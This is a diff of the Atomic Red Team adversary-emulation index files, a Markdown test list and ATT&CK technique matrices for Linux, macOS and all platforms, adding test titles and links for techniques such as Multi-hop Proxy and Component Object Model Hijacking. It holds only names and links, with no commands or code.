 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
   - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -950,6 +970,7 @@
   - Atomic Test #9: Remote System Discovery - adidnsdump [windows]
   - Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
   - Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
+  - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
   - Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -1035,7 +1056,9 @@
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1090.003 Multi-hop Proxy](../../T1090.003/T1090.003.md)
+  - Atomic Test #1: Psiphon [windows]
+  - Atomic Test #2: Tor Proxy Usage - Windows [windows]
 - T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
   - Atomic Test #1: ICMP C2 [windows]
@@ -1125,6 +1148,7 @@
   - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
   - Atomic Test #5: Task Scheduler via VBA [windows]
   - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
+  - Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1569.002 Service Execution](../../T1569.002/T1569.002.md)
@@ -1143,6 +1167,7 @@
   - Atomic Test #1: Create and Execute Batch Script [windows]
   - Atomic Test #2: Writes text to a file and displays it. [windows]
   - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
+  - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
 - [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
   - Atomic Test #1: WMI Reconnaissance Users [windows]
   - Atomic Test #2: WMI Reconnaissance Processes [windows]

atomics/Indexes/Matrices/linux-matrix.md

@@ -24,7 +24,7 @@
 |  | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | [Process Discovery](../../T1057/T1057.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Password Spraying](../../T1110.003/T1110.003.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Multi-hop Proxy](../../T1090.003/T1090.003.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SAML Tokens](../../T1606.002/T1606.002.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Screen Capture](../../T1113/T1113.md) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |

atomics/Indexes/Matrices/macos-matrix.md

@@ -24,7 +24,7 @@
 |  |  | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  |  |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [RC Scripts](../../T1037.004/T1037.004.md) | [Hidden Users](../../T1564.002/T1564.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  |  |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [RC Scripts](../../T1037.004/T1037.004.md) | [Hidden Users](../../T1564.002/T1564.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  |  |  | [Multi-hop Proxy](../../T1090.003/T1090.003.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) |  |  |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  |  | [Plist Modification](../../T1547.011/T1547.011.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |

atomics/Indexes/Matrices/matrix.md

@@ -18,13 +18,13 @@
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [Forced Authentication](../../T1187/T1187.md) | [Network Service Scanning](../../T1046/T1046.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [Forced Authentication](../../T1187/T1187.md) | [Network Service Scanning](../../T1046/T1046.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | [Native API](../../T1106/T1106.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Keylogging](../../T1056.001/T1056.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | [PowerShell](../../T1059.001/T1059.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
-|  | [Python](../../T1059.006/T1059.006.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [PowerShell](../../T1059.001/T1059.001.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
+|  | [Python](../../T1059.006/T1059.006.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | [Multi-hop Proxy](../../T1090.003/T1090.003.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Scheduled Task](../../T1053.005/T1053.005.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Query Registry](../../T1012/T1012.md) |  | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Remote System Discovery](../../T1018/T1018.md) |  | Man in the Browser [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -34,7 +34,7 @@
 |  | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable Cloud Logs](../../T1562.008/T1562.008.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Screen Capture](../../T1113/T1113.md) |  | [Protocol Tunneling](../../T1572/T1572.md) |  |
 |  | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | [Unix Shell](../../T1059.004/T1059.004.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Escape to Host](../../T1611/T1611.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) |  | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Remote Access Software](../../T1219/T1219.md) |  |
